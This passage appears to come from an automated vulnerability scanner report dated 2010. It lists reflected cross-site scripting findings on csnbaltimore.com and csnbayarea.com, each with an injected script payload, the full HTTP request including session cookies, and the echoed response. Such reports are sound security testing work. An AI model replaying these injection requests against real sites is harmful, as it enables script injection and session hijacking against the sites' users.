<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagesd5a40<script>alert(1)</script>2fc595593ef/profiles"</strong>
...[SNIP]...

2.211. http://www.csnbaltimore.com/pages/profiles [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/profiles

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e2e26<script>alert(1)</script>12a624a60d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/profilese2e26<script>alert(1)</script>12a624a60d0 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Content-Length: 791
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/profilese2e26<script>alert(1)</script>12a624a60d0"</strong>
...[SNIP]...

2.212. http://www.csnbaltimore.com/pages/profiles [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/profiles

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3344"><script>alert(1)</script>b44822d3468 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/profiles?c3344"><script>alert(1)</script>b44822d3468=1 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 38937
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--

-->
<meta http-equiv="Content-Type" content="text/html; charset=U
...[SNIP]...
<input type=hidden name="c3344"><script>alert(1)</script>b44822d3468" id = "c3344">
...[SNIP]...

2.213. http://www.csnbaltimore.com/pages/video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/video

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e981e<script>alert(1)</script>cbb3f841745 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagese981e<script>alert(1)</script>cbb3f841745/video HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Content-Length: 769
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagese981e<script>alert(1)</script>cbb3f841745/video"</strong>
...[SNIP]...

2.214. http://www.csnbaltimore.com/pages/video [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88f56<script>alert(1)</script>dd0e6f8cead was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/video88f56<script>alert(1)</script>dd0e6f8cead HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:13 GMT
Content-Length: 788
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/video88f56<script>alert(1)</script>dd0e6f8cead"</strong>
...[SNIP]...

2.215. http://www.csnbaltimore.com/pages/video [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/video

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bd0f"><script>alert(1)</script>b7a862edddf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/video?9bd0f"><script>alert(1)</script>b7a862edddf=1 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 55931
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web5.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="9bd0f"><script>alert(1)</script>b7a862edddf" id = "9bd0f">
...[SNIP]...

2.216. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a36d6"><script>alert(1)</script>4cc38bef644 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a36d6"><script>alert(1)</script>4cc38bef644/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 35402
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:19 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a36d6"><script>alert(1)</script>4cc38bef644/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html">
...[SNIP]...

2.217. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c3af"><script>alert(1)</script>280925335e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/173c3af"><script>alert(1)</script>280925335e/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 35401
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:20 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/173c3af"><script>alert(1)</script>280925335e/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html">
...[SNIP]...

2.218. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b9a"><script>alert(1)</script>5f8cf1335bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/1090b9a"><script>alert(1)</script>5f8cf1335bb/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 35402
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/1090b9a"><script>alert(1)</script>5f8cf1335bb/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html">
...[SNIP]...

2.219. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed61c"><script>alert(1)</script>1b63bb97bee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wated61c"><script>alert(1)</script>1b63bb97bee/landing_gutierrez.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 35383
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wated61c"><script>alert(1)</script>1b63bb97bee/landing_gutierrez.html">
...[SNIP]...

2.220. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3d0"><script>alert(1)</script>56354eb4635 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12cd3d0"><script>alert(1)</script>56354eb4635/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 41042
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12cd3d0"><script>alert(1)</script>56354eb4635/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html">
...[SNIP]...

2.221. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46335"><script>alert(1)</script>f110c8b6e2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/1746335"><script>alert(1)</script>f110c8b6e2c/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 41042
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/1746335"><script>alert(1)</script>f110c8b6e2c/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html">
...[SNIP]...

2.222. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efabd"><script>alert(1)</script>31a0dd08c37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10efabd"><script>alert(1)</script>31a0dd08c37/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 41042
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10efabd"><script>alert(1)</script>31a0dd08c37/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html">
...[SNIP]...

2.223. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c68e"><script>alert(1)</script>0e5f634afe3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Maiocco-Singletary-again-weighs-which-Sm3c68e"><script>alert(1)</script>0e5f634afe3/landing_maiocco_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 41023
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/Maiocco-Singletary-again-weighs-which-Sm3c68e"><script>alert(1)</script>0e5f634afe3/landing_maiocco_v3.html">
...[SNIP]...

2.224. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2b00"><script>alert(1)</script>b3b513ae740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00"><script>alert(1)</script>b3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40245
Content-Type: text/html
Set-Cookie: PHPSESSID=8924002375011fa867e8db486718e42d; path=/
Expires: Sun, 19 Dec 2010 18:12:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:12:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00"><script>alert(1)</script>b3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.225. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5969e"><script>alert(1)</script>618d21952d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/175969e"><script>alert(1)</script>618d21952d3/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40245
Content-Type: text/html
Set-Cookie: PHPSESSID=ffa30f218c9c484953facc9813c8bbd1; path=/
Expires: Sun, 19 Dec 2010 18:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:12:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/175969e"><script>alert(1)</script>618d21952d3/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.226. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be9c1"><script>alert(1)</script>cc49bcb68a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10be9c1"><script>alert(1)</script>cc49bcb68a2/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40245
Content-Type: text/html
Set-Cookie: PHPSESSID=5a4f36899cfc183f565f8c3eb2a13d16; path=/
Expires: Sun, 19 Dec 2010 18:12:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:12:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10be9c1"><script>alert(1)</script>cc49bcb68a2/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.227. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85ab2"><script>alert(1)</script>c66f7de0b0d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

